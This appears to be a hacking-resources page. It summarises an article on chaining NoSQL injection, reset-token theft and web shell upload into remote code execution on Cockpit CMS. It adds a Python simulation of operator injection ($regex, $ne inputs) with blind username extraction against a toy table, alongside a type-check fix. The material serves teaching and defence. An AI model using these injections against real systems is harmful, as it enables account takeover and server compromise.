Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

From 0 to RCE: Cockpit CMS- 459

Nikita Petrov, posted 4 years ago
  • Cockpit is a headless CMS that takes an API-first approach. Think of WordPress, but API-driven and far less widely deployed.
  • The first vulnerability is a NoSQL injection in the /auth/check API. The user parameter is passed straight into the query without a type check, so a request that supplies an array or object instead of a string turns the value into a query operator (a NoSQL conditional such as a regular-expression comparison). The injection is blind: the response only reveals whether the query matched, not the data itself.
  • The author describes an error-driven approach to extract usernames and other fields from the accounts table. In addition, the little-known $func operator supported by Cockpit's query layer (MongoLite; this is not a standard MongoDB operator), which applies a PHP function to the stored value, can be pointed at var_dump so that the data is echoed back in the response.
  • Two further NoSQL injections exist in the /auth/resetpassword and /auth/newpassword APIs. Combining them with the var_dump trick from the previous step dumps every record in the accounts table. Because those records include active password-reset tokens, this is game over.
  • Compromising an account chains the previous steps: first, use the /auth/check injection to enumerate users; then request a password reset for one of them; then use the reset-endpoint injection to read that user's token parameter. At that point we hold the user's password hash and API key, or can simply set a new password for the account.
  • With authentication bypassed, the next goal is a shell. As with many PHP-based CMS platforms, uploading a web shell through the file uploader is enough.
  • A further RCE exists where strings are concatenated into custom PHP code that is then executed. Don't do this!
  • This is an interesting article on exploiting NoSQL injection in the wild. Although the bug class is well known, it is rarely reported as an actual finding, so it is good to see real exploitation and the tricks that make it work.
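The operator-injection pattern behind the /auth/check bug, as an added example (Python, written for this page; it is not code from the article or from Cockpit's own code base). It mimics how PHP turns bracket syntax such as user[$regex]=^adm into a nested array, passes that array into a tiny query evaluator with no type check, and then runs the blind, character-by-character username extraction that a yes/no oracle allows. The accounts table, the query-string parser and the evaluator are constructed stand-ins; the assumption that makes the injection blind-exploitable is that the endpoint answers differently when a record matches, which is how the article's blind injection is described. The hardened variant rejects anything that is not a plain string at the boundary.

```python
import re
from urllib.parse import parse_qsl

# Constructed stand-in for the CMS accounts table (made-up records, not Cockpit data).
ACCOUNTS = [
    {"user": "admin", "email": "admin@example.invalid", "password": "<bcrypt hash>", "api_key": "account-0001"},
    {"user": "editor", "email": "editor@example.invalid", "password": "<bcrypt hash>", "api_key": "account-0002"},
]


def php_parse_query(qs):
    """Mimic PHP's bracket syntax: 'user[$regex]=^adm' arrives as {'user': {'$regex': '^adm'}}.
    A JSON request body delivers the same nested object without needing bracket syntax."""
    params = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params


def match(stored, cond):
    """Toy evaluator for a document-store query language (assumed, not Cockpit's engine):
    a string condition means equality, a dict is a set of operators. Only $regex and $ne exist here."""
    if isinstance(cond, str):
        return stored == cond
    if isinstance(cond, dict):
        for op, arg in cond.items():
            if op == "$regex":
                if re.search(arg, stored) is None:
                    return False
            elif op == "$ne":
                if stored == arg:
                    return False
            else:
                raise ValueError("unsupported operator: " + op)
        return True
    return False


def auth_check_vulnerable(params):
    """Look the user up with whatever 'user' value arrived, no type check.
    Returns only whether some record matched: the yes/no oracle a blind injection needs."""
    return any(match(acct["user"], params.get("user", "")) for acct in ACCOUNTS)


def auth_check_fixed(params):
    """Same lookup, but a non-string (array/object) parameter is refused before it reaches the query."""
    user = params.get("user")
    if not isinstance(user, str):
        return False
    return any(acct["user"] == user for acct in ACCOUNTS)


def extract_usernames(oracle, alphabet="abcdefghijklmnopqrstuvwxyz0123456789_", max_len=32):
    """Recover every username using only the oracle's yes/no answers: extend a prefix one
    character at a time with ^prefix regexes, and record a prefix when ^prefix$ also matches."""
    found = []

    def walk(prefix):
        if prefix and oracle({"user": {"$regex": "^" + re.escape(prefix) + "$"}}):
            found.append(prefix)
        if len(prefix) >= max_len:
            return
        for ch in alphabet:
            if oracle({"user": {"$regex": "^" + re.escape(prefix + ch)}}):
                walk(prefix + ch)

    walk("")
    return sorted(found)


if __name__ == "__main__":
    injected = php_parse_query("user[$regex]=^adm&password=x")
    print("parsed request:", injected)
    print("vulnerable endpoint matched:", auth_check_vulnerable(injected))
    print("usernames leaked blind:", extract_usernames(auth_check_vulnerable))
    print("fixed endpoint matched:", auth_check_fixed(injected))
    print("usernames leaked from fixed endpoint:", extract_usernames(auth_check_fixed))
```

The fix is deliberately a type check rather than an allow-list of operators: in PHP the equivalent is refusing the request unless is_string() holds for the parameter before it is handed to the storage layer, which also closes the $ne-style bypass ({"user": {"$ne": ""}}) that matches any record at all.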